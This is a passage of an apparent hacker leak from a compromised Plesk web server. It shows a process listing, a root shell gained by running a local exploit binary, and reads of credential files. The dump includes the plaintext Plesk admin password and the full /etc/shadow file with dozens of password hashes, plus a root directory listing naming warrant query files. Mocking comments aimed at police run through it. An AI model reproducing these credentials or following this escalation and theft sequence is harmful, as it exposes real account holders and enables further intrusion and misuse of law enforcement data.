popuser 1388 0.0 0.0 7372 1528 ? S Jul16 0:54 /usr/bin/imapd

Maildir

root 1401 0.0 0.0 5072 1608 ? S Jul16 0:01

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

popuser 1402 0.0 0.0 7296 1508 ? S Jul16 0:02 /usr/bin/imapd

Maildir

root 2218 0.0 0.0 13668 904 ? S< Feb22 0:00 [krfcommd]

root 2489 0.0 0.0 12948 1344 ? Ssl Feb22 2:16 pcscd

root 2503 0.0 0.0 1756 520 ? Ss Feb22 0:00 /usr/sbin/acpid

root 2527 0.0 0.0 2004 448 ? Ss Feb22 0:00 /usr/bin/hidd

--server

root 2552 0.0 0.0 30436 1320 ? Ssl Feb22 1:12 automount

root 2597 0.0 0.0 7212 872 ? Ss Feb22 2:01 /usr/sbin/sshd

root 2610 0.0 0.1 10256 2072 ? Ss Feb22 0:00 cupsd

root 2747 0.0 0.0 2000 464 ? Ss Feb22 0:00 gpm -m

/dev/input/mice -t exps2

postgres 2982 0.0 0.0 21240 1688 ? S Feb22 0:00

/usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data

postgres 2984 0.0 0.0 11016 420 ? S Feb22 0:06 postgres:

logger process

postgres 3001 0.0 0.0 21240 512 ? S Feb22 0:04 postgres:

writer process

postgres 3002 0.0 0.0 12020 292 ? S Feb22 0:00 postgres: stats

buffer process

postgres 3003 0.0 0.0 11204 336 ? S Feb22 0:00 postgres: stats

collector process

root 3046 0.0 7.0 248660 144752 ? Ss Feb22 108:36 /usr/sbin/httpd

xfs 3336 0.0 0.0 3584 1188 ? Ss Feb22 0:00 xfs -droppriv

-daemon

root 3363 0.0 0.0 2360 444 ? Ss Feb22 0:00 /usr/sbin/atd

avahi 3398 0.0 0.0 2684 1316 ? Ss Feb22 0:03 avahi-daemon:

running [ip-97-74-115-143.local]

avahi 3404 0.0 0.0 2684 424 ? Ss Feb22 0:00 avahi-daemon:

chroot helper

68 3435 0.0 0.1 5776 3856 ? Ss Feb22 0:04 hald

root 3436 0.0 0.0 3256 1088 ? S Feb22 0:00 hald-runner

68 3447 0.0 0.0 2104 828 ? S Feb22 0:00

hald-addon-acpi: listening on acpid socket /var/run/acpid.socket

root 3475 0.0 0.0 33784 884 ? Sl Feb22 0:15 /usr/bin/hptsvr

root 3481 0.0 0.5 28360 11900 ? SN Feb22 0:08 /usr/bin/python

-tt /usr/sbin/yum-updatesd

root 3527 0.0 0.0 2656 1216 ? SN Feb22 0:26

/usr/libexec/gam_server

root 3855 0.0 0.0 3604 428 ? S Feb22 0:00

/usr/sbin/smartd -q never

root 3858 0.0 0.0 1744 464 tty1 Ss+ Feb22 0:00 /sbin/mingetty

tty1

root 3859 0.0 0.0 1748 468 tty2 Ss+ Feb22 0:00 /sbin/mingetty

tty2

root 3860 0.0 0.0 1744 464 tty3 Ss+ Feb22 0:00 /sbin/mingetty

tty3

root 3862 0.0 0.0 1744 460 tty4 Ss+ Feb22 0:00 /sbin/mingetty

tty4

root 3865 0.0 0.0 1744 464 tty5 Ss+ Feb22 0:00 /sbin/mingetty

tty5

root 3867 0.0 0.0 1748 468 tty6 Ss+ Feb22 0:00 /sbin/mingetty

tty6

root 3869 0.0 0.4 23908 8900 ? Ss Feb22 1:43

/usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini

/usr/local/psa/admin/bin/modules/watchdog/wdcollect -c

/usr/local/psa/etc/modules/watchdog/wdcollect.inc.php

root 3870 0.0 0.1 37624 2848 ? Ssl Feb22 47:27

/usr/local/psa/admin/bin/modules/watchdog/monit -Ic

/usr/local/psa/etc/modules/watchdog/monitrc

root 5213 0.0 0.1 12360 3512 ? Ss Jul22 0:13 sshd:

root@notty

root 5217 0.0 0.0 6856 1748 ? Ss Jul22 0:00

/usr/libexec/openssh/sftp-server

root 5971 0.0 0.0 5068 1616 ? S Jul24 0:00

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

popuser 5974 0.0 0.0 7300 1248 ? S Jul24 0:00 /usr/bin/imapd

Maildir

root 6969 0.0 0.1 12132 3216 ? Ss Jul21 0:15 sshd:

root@notty

root 6978 0.0 0.0 6780 1604 ? Ss Jul21 0:00

/usr/libexec/openssh/sftp-server

root 6982 0.0 1.4 32744 30092 ? Ss Jul18 0:17 /usr/bin/spamd

--username=popuser --daemonize --nouser-config --helper-home-dir=/var/qmail

--max-children 5 --create-prefs

--virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassin

--pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock

root 7630 0.0 0.0 5380 1000 ? Ss Feb24 1:00 crond

root 7986 0.0 0.0 0 0 ? S Jul23 0:12 [pdflush]

30 8301 0.0 0.0 3208 564 ? Ss Mar16 0:00

/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue

30 8302 0.0 0.0 3208 564 ? Ss Mar16 0:00

/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote

apache 8354 0.1 6.8 249524 140568 ? S 03:04 0:02 /usr/sbin/httpd

drweb 9073 0.0 6.8 145876 140908 ? S 03:06 0:00 drwebd.real

drweb 9074 0.0 6.8 145876 140932 ? S 03:06 0:00 drwebd.real

drweb 9075 0.0 6.8 145876 141492 ? S 03:06 0:00 drwebd.real

drweb 9076 0.0 6.8 145876 141088 ? S 03:06 0:00 drwebd.real

popuser 9288 0.1 1.7 39044 36312 ? S 00:04 0:17 spamd child

501 9741 0.0 0.2 9744 6176 ? S Jul20 0:27

/usr/sbin/sw-cp-serverd -f /etc/sw-cp-server/config

root 10034 0.0 0.0 5072 1616 ? S Jul24 0:00

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

popuser 10043 0.0 0.0 7296 1292 ? S Jul24 0:00 /usr/bin/imapd

Maildir

apache 10113 0.1 6.8 249356 140544 ? S 03:14 0:02 /usr/sbin/httpd

popuser 10206 0.1 1.7 39588 36860 ? S Jul24 0:49 spamd child

root 11201 0.0 0.0 4904 944 pts/2 S+ Jul20 0:00 screen

root 11202 0.0 0.0 5584 1668 ? Ss Jul20 0:03 SCREEN

root 11203 0.0 0.0 4764 1500 pts/1 Ss+ Jul20 0:00 /bin/bash

root 11229 0.0 0.0 4760 1524 pts/3 Ss+ Jul20 0:00 /bin/bash

root 11698 0.0 0.0 5072 1612 ? S Jul12 0:01

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

popuser 11701 0.0 0.0 7296 1500 ? S Jul12 0:42 /usr/bin/imapd

Maildir

root 11877 0.0 0.0 5072 1612 ? S Jul12 0:01

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

popuser 11878 0.0 0.0 7296 1172 ? S Jul12 0:13 /usr/bin/imapd

Maildir

root 12664 0.0 0.0 2832 780 ? Ss May17 1:33 xinetd

-stayalive -pidfile /var/run/xinetd.pid

drweb 12921 0.4 6.8 145876 142236 ? Ss May05 523:34 drwebd.real

apache 14656 0.1 6.8 249468 140792 ? S 03:21 0:02 /usr/sbin/httpd

apache 14807 0.0 6.8 249324 140492 ? S 03:22 0:01 /usr/sbin/httpd

apache 14927 0.1 7.2 258392 149936 ? S 03:22 0:01 /usr/sbin/httpd

apache 15025 0.1 6.8 249560 141268 ? S 03:23 0:02 /usr/sbin/httpd

popuser 15706 0.0 0.0 7404 1528 ? S 03:25 0:00 /usr/bin/imapd

Maildir

30 15854 0.0 0.0 3208 660 ? Ss Mar22 0:00

/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue

30 15856 0.0 0.0 3200 824 ? Ss Mar22 0:00

/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote

apache 16054 0.0 6.8 251588 140624 ? S 03:29 0:00 /usr/sbin/httpd

apache 16681 0.0 6.7 249208 140300 ? S 03:30 0:00 /usr/sbin/httpd

root 17623 0.0 0.0 5072 1616 ? S 00:29 0:00

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

popuser 17629 0.0 0.0 7296 1412 ? S 00:29 0:00 /usr/bin/imapd

Maildir

root 17716 0.0 0.0 0 0 ? S Jul24 0:14 [pdflush]

popuser 18091 0.0 0.0 7292 1136 ? S 01:38 0:00 /usr/bin/imapd

Maildir

root 18097 0.0 0.0 5068 1596 ? S 01:38 0:00 couriertls

-localfd=4 -tcpd -server

apache 18708 0.1 6.7 249328 139912 ? S 03:38 0:00 /usr/sbin/httpd

30 19002 0.0 0.0 3200 564 ? Ss May05 0:00

/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote

root 19106 0.0 0.0 6072 732 ? S Jul08 0:09

/usr/lib/courier-imap/couriertcpd -address=0

-stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40

-maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143

/usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

root 19110 0.0 0.0 4904 1116 ? S Jul08 0:06

/usr/sbin/courierlogger imapd

root 19118 0.0 0.0 6068 732 ? S Jul08 0:14

/usr/lib/courier-imap/couriertcpd -address=0

-stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40

-maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

root 19120 0.0 0.0 4904 808 ? S Jul08 0:11

/usr/sbin/courierlogger imapd-ssl

root 19126 0.0 0.0 6072 748 ? S Jul08 0:32

/usr/lib/courier-imap/couriertcpd -address=0

-stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40

-maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110

/usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir

root 19128 0.0 0.0 4900 1112 ? S Jul08 0:23

/usr/sbin/courierlogger pop3d

root 19135 0.0 0.0 6068 728 ? S Jul08 0:30

/usr/lib/courier-imap/couriertcpd -address=0

-stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40

-maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995

/usr/bin/couriertls -server -tcpd /usr/sbin/pop3login

/usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir

root 19137 0.0 0.0 4904 996 ? S Jul08 0:23

/usr/sbin/courierlogger pop3d-ssl

apache 20073 0.0 6.7 248988 138776 ? S 03:43 0:00 /usr/sbin/httpd

root 20144 0.0 0.0 5068 1612 ? S 03:44 0:00

/usr/bin/couriertls -server -tcpd /usr/sbin/pop3login

/usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir

popuser 20145 0.0 0.0 4936 860 ? S 03:44 0:00 /usr/bin/pop3d

Maildir

apache 20319 0.0 6.4 236508 132820 ? S Jul24 0:00 /usr/sbin/httpd

postfix 20848 0.0 0.1 8816 3452 ? S 03:46 0:00 smtpd -n smtp

-t inet -u -c -o smtpd_proxy_filter 127.0.0.1:10025

postfix 20849 0.0 0.0 7012 1732 ? S 03:46 0:00 proxymap -t

unix -u

postfix 20850 0.0 0.0 7024 1732 ? S 03:46 0:00 anvil -l -t

unix -u

postfix 20851 0.0 0.1 7172 2156 ? S 03:46 0:00 trivial-rewrite

-n rewrite -t unix -u

postfix 20852 0.0 0.0 7020 1720 ? S 03:46 0:00 spawn -n

127.0.0.1:10025 -t inet user=mhandlers-user

argv=/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue

postfix 20854 0.0 0.0 7024 1728 ? S 03:46 0:00 spawn -n

127.0.0.1:10027 -t inet user=mhandlers-user

argv=/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote

postfix 20856 0.0 0.1 8848 3292 ? S 03:46 0:00 smtpd -n

127.0.0.1:10026 -t inet -u -c -o smtpd_client_restrictions -o

smtpd_helo_restrictions -o smtpd_sender_restrictions -o

smtpd_recipient_restrictions permit_mynetworks,reject -o smtpd_data_restrictions

-o receive_override_options no_unknown_recipient_checks

postfix 20857 0.0 0.1 7156 2272 ? S 03:46 0:00 cleanup -z -t

unix -u

postfix 20858 0.0 0.0 7068 1824 ? S 03:46 0:00 pipe -n

plesk_virtual -t unix flags=DORhu user=popuser popuser

argv=/usr/lib/plesk-9.0/postfix-local -f ${sender} -d ${recipient} -p

/var/qmail/mailnames

apache 20889 0.0 0.0 2272 824 ? R 03:47 0:00 ps -aux

root 21272 0.0 0.1 12936 4096 ? Ss Jul21 0:16 sshd:

root@notty

root 21278 0.0 0.0 6796 1748 ? Ss Jul21 0:00

/usr/libexec/openssh/sftp-server

root 21568 0.0 0.0 6968 1788 ? Ss Jul08 5:03

/usr/libexec/postfix/master

postfix 21765 0.0 0.1 8244 3064 ? S Jul08 3:16 qmgr -l -t fifo

-u

postfix 21910 0.0 0.0 7068 1932 ? S Jul08 0:09 tlsmgr -l -t

unix -u

apache 22145 0.1 7.0 256496 146220 ? S 01:56 0:08 /usr/sbin/httpd

30 23051 0.0 0.0 3200 652 ? Ss Mar18 0:00

/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue

30 23052 0.0 0.0 3200 708 ? Ss Mar18 0:00

/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote

root 23196 0.0 0.0 4764 1500 pts/0 Ss+ Jul20 0:00 /bin/bash

named 24811 0.0 0.2 72156 5504 ? Ssl Jun29 11:38 /usr/sbin/named

-u named -c /etc/named.conf -u named -t /var/named/run-root

apache 25023 0.1 6.8 249408 140780 ? S 02:10 0:06 /usr/sbin/httpd

apache 25276 0.1 6.8 251928 141112 ? S 02:10 0:09 /usr/sbin/httpd

apache 26378 0.1 6.8 249368 140756 ? S 02:13 0:05 /usr/sbin/httpd

postfix 30087 0.0 0.0 7032 1780 ? S 02:20 0:00 pickup -l -t

fifo -u -c -o content_filter smtp:127.0.0.1:10027

root 30254 0.0 0.1 12140 3216 ? Ss Jul18 0:30 sshd:

root@pts/2

root 30395 0.0 0.0 4764 1512 pts/2 Ss Jul18 0:00 -bash

apache 30715 0.0 6.8 249436 140620 ? S 02:21 0:04 /usr/sbin/httpd

root 31126 0.0 0.0 4624 1216 pts/1 S Jul20 0:00 /bin/sh

/usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock

--log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid

--user=mysql

mysql 31206 24.4 2.2 166880 45728 pts/1 Sl Jul20 1587:18

/usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql

--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking

--socket=/var/lib/mysql/mysql.sock

root 31988 0.0 0.0 5072 1604 ? S Jul16 0:01

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

popuser 31992 0.0 0.0 7292 1420 ? S Jul16 0:03 /usr/bin/imapd

Maildir

// TIME TO GET STREET ON THESE PIGS

$ ./a.black.hat.never.kisses.and.tells

# id

uid=0(root) gid=0(root) groups=48(apache),2521(psaserv)

// CRACKING SHADOW FILES ARE LESS FUN WHEN PLESK STORES USER, FTP AND EMAIL

// PASSES IN PLAINTEXT IN FILES AND MYSQL PSA TABLES

# cat /etc/psa/.psa.shadow

8w667nHzx%XFXb

# cat /etc/shadow

root:$1$9f.5eJ9.$QUYSU4l8mMYIIhg7Dvk5n0:15135:0:99999:7:::

bin:*:13913:0:99999:7:::

daemon:*:13913:0:99999:7:::

adm:*:13913:0:99999:7:::

lp:*:13913:0:99999:7:::

sync:*:13913:0:99999:7:::

shutdown:*:13913:0:99999:7:::

halt:*:13913:0:99999:7:::

mail:*:13913:0:99999:7:::

news:*:13913:0:99999:7:::

uucp:*:13913:0:99999:7:::

operator:*:13913:0:99999:7:::

games:*:13913:0:99999:7:::

gopher:*:13913:0:99999:7:::

ftp:*:13913:0:99999:7:::

nobody:*:13913:0:99999:7:::

rpm:!!:13913:0:99999:7:::

dbus:!!:13913:0:99999:7:::

mailnull:!!:13913:0:99999:7:::

smmsp:!!:13913:0:99999:7:::

nscd:!!:13913:0:99999:7:::

vcsa:!!:13913:0:99999:7:::

rpc:!!:13913:0:99999:7:::

rpcuser:!!:13913:0:99999:7:::

nfsnobody:!!:13913:0:99999:7:::

sshd:!!:13913:0:99999:7:::

pcap:!!:13913:0:99999:7:::

haldaemon:!!:13913:0:99999:7:::

webdept:$1$fMH2nTXH$8mR4nakYDl79MWehtHJpJ/:14599:0:99999:7:::

avahi:!!:14599::::::

avahi-autoipd:!!:14599::::::

named:!!:14599::::::

xfs:!!:14599::::::

apache:!!:14599::::::

distcache:!!:14599::::::

mysql:!!:14599::::::

ntp:!!:14599::::::

sw-cp-server:!!:14599:0:99999:7:::

psaadm:!!:14599:0:99999:7:::

popuser:!!:14599:0:99999:7:::

mhandlers-user:!!:14599:0:99999:7:::

webalizer:!!:14599::::::

psaftp:!!:14599:0:99999:7:::

alias:!!:14599:0:99999:7:::

qmaild:!!:14599:0:99999:7:::

qmaill:!!:14599:0:99999:7:::

qmailp:!!:14599:0:99999:7:::

qmailq:!!:14599:0:99999:7:::

qmailr:!!:14599:0:99999:7:::

qmails:!!:14599:0:99999:7:::

postgres:!!:14599::::::

drweb:!!:14599::::::

jdpa:!$1$JyO0yJgZ$HssFeCuxD2qNPBcqVAcrE0:14600:0:99999:7:::

barms:$1$JMHnROPk$hW1voLIUUozaP3fB/Q3PS/:14600:0:99999:7:::

bcsd:$1$9N.SKA8k$UB9Fa1pj4O9ScqvanwsuD0:14600:0:99999:7:::

bjm:$1$nQFDQuzG$nixGXRSZ2weKVIZbWvY2Y1:14600:0:99999:7:::

demo:$1$A/PXg4Bp$gxE6Tua9ymjgqIZiruTZJ/:14600:0:99999:7:::

dymin:$1$aV.nPRpD$w0u6q9utdB9fC0ze0Y9jk1:14600:0:99999:7:::

dcsd:$1$BmkM/hGw$WYVxaTBKlAnAG9oZfTNs40:14600:0:99999:7:::

bocg:$1$YCTsX/LA$muqhDQl9XfKRS691T9Ebu0:14600:0:99999:7:::

crcsd:$1$R2N6hV/D$Efk6P7K2EF6waHHkC.z9/.:14600:0:99999:7:::

bocs:$1$WTdEJKgC$cTG5MeoEUpdCmEODakZbF.:14600:0:99999:7:::

izhth:$1$kUKcvc.x$D20GJqyHyrmwvt9SUHSuo0:14600:0:99999:7:::

mcmtn:$1$neyLtM6z$VuI6CW0/bf5hdOUqgGkSn0:14600:0:99999:7:::

ccsal:$1$vhubLzwF$Evrqm.AX4vusW3SqmZA3B0:14600:0:99999:7:::

tunms:$1$annTeiUZ$twvp7SQzRRNJNEIvxS3Cx/:14600:0:99999:7:::

ccsd:$1$Lzz71cOH$Djo2V4u/SL9JKqrkvK0/41:14600:0:99999:7:::

ciwy:$1$DrcaNoRu$pj27lg4ogzIM/1T3xXCpF/:14600:0:99999:7:::

ncsd:$1$KRjV7G3q$sdkmFwpIp7p9FF1f4hhn90:14600:0:99999:7:::

icsd:$1$Jg/IPNZ3$173b6vFq9AlwznflpUbzp/:14600:0:99999:7:::

shsd:$1$4JEzAXVt$KG42rhcwE0livRJ00Awgb/:14600:0:99999:7:::

polms:$1$QEqTUIBr$L1VWAWaGnhYGsRu0FDrr6/:14600:0:99999:7:::

grcg:$1$yoyTc6DI$X8v6sg7ExdoUg0bNi8kmU/:14600:0:99999:7:::

lawmo:$1$0uQIYYqK$y0TIsAA9Miv4Vfn5o7KhR.:14600:0:99999:7:::

johms:$1$ljRMripB$/v33v9izoRJKITBK04ZgV.:14600:0:99999:7:::

sacsd:$1$6vTTH5h.$mu0.aSPxOJnNfw0Y1Yhy81:14600:0:99999:7:::

jcsd:$1$SR7NPa.y$bXGwoje29eCLh/jeptX7m.:14600:0:99999:7:::

gcsd:$1$ai7yamMR$JZPQccHWCGmMDeQFJ56eg0:14600:0:99999:7:::

izcg:$1$PpoAe8un$Tmmp4XEdNWUlJPSJv80Xj0:14600:0:99999:7:::

jocsd:$1$NRHv77bV$LA2Xex9kNa46frC/0ArlW1:14600:0:99999:7:::

scsd:$1$xKBlDTZE$.mpjBbZ0yHHsNcFCmu7pT0:14600:0:99999:7:::

bjm2:$1$IyEce8if$BFsLo9r.7HgTftQhJHGPh/:14600:0:99999:7:::

test:$1$/SMm0ODb$EX2C/eZ7Lo3BPfzIlZfBF0:14601:0:99999:7:::

bcsd_sync:$1$6WexrYqZ$3ROvk9LXiGIAjx/yMFgGc.:14601:0:99999:7:::

ccsal_synce:!!:14601:0:99999:7:::

ccsal_sync:$1$1R4G9HKN$0nsQSMPnDwPI8QwcOoB4x0:14601:0:99999:7:::

kluser:!!:14602:0:99999:7:::

tigeraccessftp:$1$vIx5yzLJ$QLvytS5blodUB69dx4Ff81:14607:0:99999:7:::

vbcsd:$1$Xa7IjTjy$EVOg0CDGrhKecE9tcEv0K1:14614:0:99999:7:::

jonms2:$1$UEKyybmq$V.KCuSAArIbZ97Rb3j.Gj.:14624:0:99999:7:::

ccsoks:$1$5Um4tVSe$nmmR1DwLGB1rVtilMJUnW.:14629:0:99999:7:::

crcg:$1$5W78GNCt$5AsiPm0MkUOaxLy7PZUbC.:14637:0:99999:7:::

tcsoms:$1$AUtRv.T/$8PAgYTEZNTkHAg29MuxxA.:14644:0:99999:7:::

hcsoks:$1$QNKj.3g8$a5XwX/ucCpz25QC.a7Yyr1:14650:0:99999:7:::

jcsoks:$1$rLe4qHgu$YVf.K6kRj5bzWE/bYYG2x/:14656:0:99999:7:::

mosa:$1$dIsYss8M$8wcFZe8f9xyrQg/M5fw2q.:14662:0:99999:7:::

pcsoks:$1$aOO/b7/y$fksYEq1P0ydvkBDACy7PN1:14678:0:99999:7:::

johms_sync:$1$JJOQW/Ub$KQcLsIuntNhvuT.IgHfr51:15140:0:99999:7:::

hcsar:$1$HRrStn03$JID8.6JAq3uO9Ea89sGWy/:14691:0:99999:7:::

hscar:$1$eT4u9sV5$1yfafNGVFeJLzHKIDnTPB.:14691:0:99999:7:::

pcsoia:$1$iA.cOgM7$bKcN9Md8bgaqgDOeWMLTk1:14692:0:99999:7:::

mcsd:$1$w8xq8Wiz$9h9Vmun9mouExbFw5TP9./:14701:0:99999:7:::

wsoks:$1$RA/aiiIn$vWff63MvT9OM6m/I9g/wI1:14718:0:99999:7:::

mosa2010bN:!!:14719:0:99999:7:::

mosa2010:$1$rkKGNbTJ$zuSXZpGmBGZmBLblIR..M0:14720:0:99999:7:::

faoret:$1$6FeVAWdI$5tdP6hddCUejnapF8SpSr.:14725:0:99999:7:::

bcso_tiger:$1$LY1S8HSQ$nmrLU.ZovFp/3SyDPqh/G.:14727:0:99999:7:::

stcsd:$1$pDRSTxFh$ZBvOBAFQ7LnFMjUdsa16g.:14728:0:99999:7:::

ccsoms:$1$2AcdfJU9$S7c4H4a0ySzzHVv1Xp8vT0:14736:0:99999:7:::

kcsoms:$1$9/UGCy/Q$v0YU2N4s6fJA1WRrnO4/y1:14743:0:99999:7:::

pcsoks_sync:$1$ZVgfXBYP$8/7JU659Rzy6AFMTsgUDk1:14753:0:99999:7:::

mocsd:$1$ruYfFxnn$THY1iwfnln5fIWJEZ.xuI1:14754:0:99999:7:::

postfix:!!:14768::::::

bcsoga:$1$um3cyDMU$iyb6m61oqCGNxsBoFTLP2/:14770:0:99999:7:::

jonms_sync:$1$ox9q2AUv$Z.PKJVfV6wBqkdE27vbNw/:14771:0:99999:7:::

jcsoks_sync:$1$XkeeIlA/$6H68JaLVbeKNw7YGOOkX31:14790:0:99999:7:::

cpsola:$1$NwWGtomq$jgAUVRm6VBvGSujRtKwF31:14806:0:99999:7:::

cgsomo:$1$eilIGZWl$eLznlmIdX3xApkdWmpsnT.:14810:0:99999:7:::

sfsoar:$1$yOE1lcCf$GUu9M1fczt1Ghc764zw/30:14824:0:99999:7:::

sfsoar_sync:$1$nxHb55iY$vFvZhr1ruVHu/4U981Jk2.:14826:0:99999:7:::

code:$1$iqeHXuMI$4vRAcEszoYdstIN3RMgx60:14837:0:99999:7:::

fcsoga:$1$T2d2gmYb$FFMQvYx7VRTFEtMtYzENj1:14841:0:99999:7:::

mcsoga:$1$sU6wEv93$dY7TnQIfrf7CNtxrb1BHv0:14852:0:99999:7:::

code2:$1$j9vWcrHj$ackLsXxNqZYDlHGs9EfTJ/:14853:0:99999:7:::

kcsoil:$1$RktuLOY5$rqG9aojQ7QPev715Sziym0:14855:0:99999:7:::

mcsoal:$1$DfHeInc2$tl5Z3EJ5cbpEI7PAi..nR.:14874:0:99999:7:::

sgsomo:$1$ofmWWjSo$VdSaYP7i5Mq3TaigZKJmY/:14879:0:99999:7:::

gcsoms:$1$GwuFixxs$ar2pJ.ZaG9F/zahcjl0JP0:14879:0:99999:7:::

stoms:$1$VRmMMzI7$x1nr.ZMBdSv7VOng/TpX//:14897:0:99999:7:::

hcsar_sync:$1$k8HSpdqc$5G8/PJOdzeQN8W2VKJj461:14901:0:99999:7:::

alsa:$1$0D1HLRSq$6mKb1LEmHoM/q2HhpXSjq/:14902:0:99999:7:::

pcsoar:$1$HxfuMiMY$bAapp8diWD1nSOjkTEqNx/:14917:0:99999:7:::

rcsd:$1$9poK4hQN$gzorj3zcz7dpG21M45ai5.:14921:0:99999:7:::

tisoms:$1$wXhmWMjs$EARUykep59RVk3KBNLIay/:14924:0:99999:7:::

stoms_sync:$1$TEYhWb2S$dYeYk0rb/sqikIaqqovuR/:14945:0:99999:7:::

prsoar:$1$ZIuKGFWZ$b9QSyf2DPsYbBm/pNe.WP1:14952:0:99999:7:::

mcsd_sync:$1$b1gA3kVg$Rg3yF/yRG.A/YEM4idaXW1:15001:0:99999:7:::

jccgms:$1$52kEGL60$J3C2CN/1fq4b.nD1EaNHP1:15009:0:99999:7:::

ccsook:$1$amm2tffa$XaIWUbOY47Dr02lvTWEFf/:15056:0:99999:7:::

fcsoar:$1$W74MwMzz$QuYSprTouxtkRx/wKgIJL1:15057:0:99999:7:::

poalac:$1$q.RuXO6m$C/hJSOR8TUzP5iZvmh3vc1:15085:0:99999:7:::

arsa:$1$dY5DsE1V$aGJWYgu9pj.kO0gQ14zpd0:15097:0:99999:7:::

rcpica:$1$CXfW/jiM$PrVYk8La/RySYfT0FeMRI/:15100:0:99999:7:::

ciga:$1$QTWBjVx9$zs4DkuPeQ7IuyaFtXby3B.:15113:0:99999:7:::

sfcgar:$1$GqNHP49J$0idVp0wiWtAcd848aWI5O/:15131:0:99999:7:::

lcsomo:$1$ptPfDVG3$nvwb9D.toLPBP1NsCRbNs1:15132:0:99999:7:::

tcsoal:$1$0oUtGUJd$dAyePg9xnfh2dNDHRr/s80:15134:0:99999:7:::

jwiegand:$1$F.H2Vzt/$BzID0ITAA2LtVZ99e5anu.:15135:0:99999:7:::

bcsf:$1$pznU6Acd$jDjShBfJXAE3YUdsF7W140:15135:0:99999:7:::

prsoms:$1$NpevRywM$.lnU4tjwBZNx5DyzQ5e8e0:15135:0:99999:7:::

acsoms:$1$rRiyYAkw$a9FJbLJJZgcWYgdUX5m/B.:15147:0:99999:7:::

kssa:$1$QJmmY.q8$GKzc4XMppwpKPbPVkI/1H1:15149:0:99999:7:::

// YOU KNOW WHAT IT IS, ITS A STICKUP

# ls -al ~root

total 420776

drwxr-x--- 17 root root 4096 Jul 22 11:37 .

drwxr-xr-x 26 root root 4096 Feb 22 22:21 ..

drwxr-xr-x 2 root root 4096 Nov 30 2010 .autoinstaller

-rw------- 1 root root 19127 Jul 21 15:58 .bash_history

-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout

-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile

-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc

-rw-r--r-- 1 root root 121 Sep 2 2010 .cshrc

-rw-r--r-- 1 root root 9 Feb 10 10:28 .exrc

-rw------- 1 root root 686 Jul 20 13:03 .lesshst

-rw------- 1 root root 1739 Jul 20 10:29 .mysql_history

-rw-r--r-- 1 root root 91 Dec 23 2009 .pearrc

-rw------- 1 root root 1024 May 3 09:00 .rnd

drwx------ 2 root root 4096 Mar 12 2010 .spamassassin

drwx------ 2 root root 4096 Jan 25 13:27 .ssh

-rw------- 1 root root 276 Jul 20 10:44 .support_history

-rw-r--r-- 1 root root 150 Sep 2 2010 .tcshrc

-rw-r--r-- 1 root root 1143587 Jul 22 11:50 BOCS_warrant_query.sql

-rw-r--r-- 1 root root 187976 Jul 22 11:45 CRCSD_warrant_query.sql

-rw-r--r-- 1 root root 3543 Feb 23 09:42 Chicago

drwxrwxrwx 17 20 games 4096 Dec 30 2009 ImageMagick-6.4.8-3

-rw-r--r-- 1 root root 11148165 Apr 9 2009 ImageMagick-6.4.8-3.tar.gz

drwxr-xr-x 2 root root 4096 Jul 14 15:15 MASS_PASS

-rw-r--r-- 1 root root 94158 Dec 13 2010 MCSOAL.search

-rw-r--r-- 1 root root 1501473 Jul 22 11:48 SFSOAR_warrant_query.sql

-rw------- 1 root root 742 Feb 4 2008 anaconda-ks.cfg

drwxr-xr-x 2 root root 4096 Jun 21 15:31 bin

drwxr-xr-x 2 root root 4096 May 3 09:53 cert

